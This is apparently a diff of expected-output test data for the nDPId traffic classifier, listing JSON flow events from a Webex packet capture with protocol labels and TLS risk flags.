-00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570719041,"flow_last_seen":1444570720045,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51859,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1444570636180,"flow_last_seen":1444570636961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":7084,"flow_avg_l4_payload_len":442,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1444570636259,"flow_last_seen":1444570640345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4387,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1444570636270,"flow_last_seen":1444570640346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636151,"flow_last_seen":1444570638237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640284,"flow_last_seen":1444570645701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1444570636264,"flow_last_seen":1444570640345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4387,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636155,"flow_last_seen":1444570639261,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":4355,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640298,"flow_last_seen":1444570645704,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00924{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570636160,"flow_last_seen":1444570639259,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7020,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570675941,"flow_last_seen":1444570690940,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570694561,"flow_last_seen":1444570709697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00923{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1444570716599,"flow_last_seen":1444570737975,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7640,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570719041,"flow_last_seen":1444570720045,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51859,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570719041,"flow_last_seen":1444570720045,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51859,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1444570636180,"flow_last_seen":1444570636961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":7084,"flow_avg_l4_payload_len":442,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1444570636259,"flow_last_seen":1444570640345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4387,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1444570636270,"flow_last_seen":1444570640346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636151,"flow_last_seen":1444570638237,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640284,"flow_last_seen":1444570645701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1444570718801,"flow_last_seen":1444570739041,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51772,"dst_port":9000,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Webex","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1444570718801,"flow_last_seen":1444570739041,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51772,"dst_port":9000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570631058,"flow_last_seen":1444570631059,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"107.20.242.44","src_port":59447,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570631058,"flow_last_seen":1444570631059,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"107.20.242.44","src_port":59447,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636255,"flow_last_seen":1444570639258,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2920,"flow_tot_l4_payload_len":7052,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1444570640346,"flow_last_seen":1444570640407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1444570640346,"flow_last_seen":1444570640407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636248,"flow_last_seen":1444570639255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":7031,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570630272,"flow_last_seen":1444570630272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"185.63.147.10","src_port":54651,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570630272,"flow_last_seen":1444570630272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"185.63.147.10","src_port":54651,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570632436,"flow_last_seen":1444570633205,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2903,"flow_tot_l4_payload_len":4426,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570638225,"flow_last_seen":1444570642072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3697,"flow_tot_l4_payload_len":5437,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1444570636359,"flow_last_seen":1444570639256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":6215,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640330,"flow_last_seen":1444570670371,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640338,"flow_last_seen":1444570670373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00925{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":105,"flow_first_seen":1444570669736,"flow_last_seen":1444570738301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":13596,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00927{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":513,"flow_first_seen":1444570669745,"flow_last_seen":1444570732084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":29642,"flow_tot_l4_payload_len":316364,"flow_avg_l4_payload_len":616,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570674487,"flow_last_seen":1444570675890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 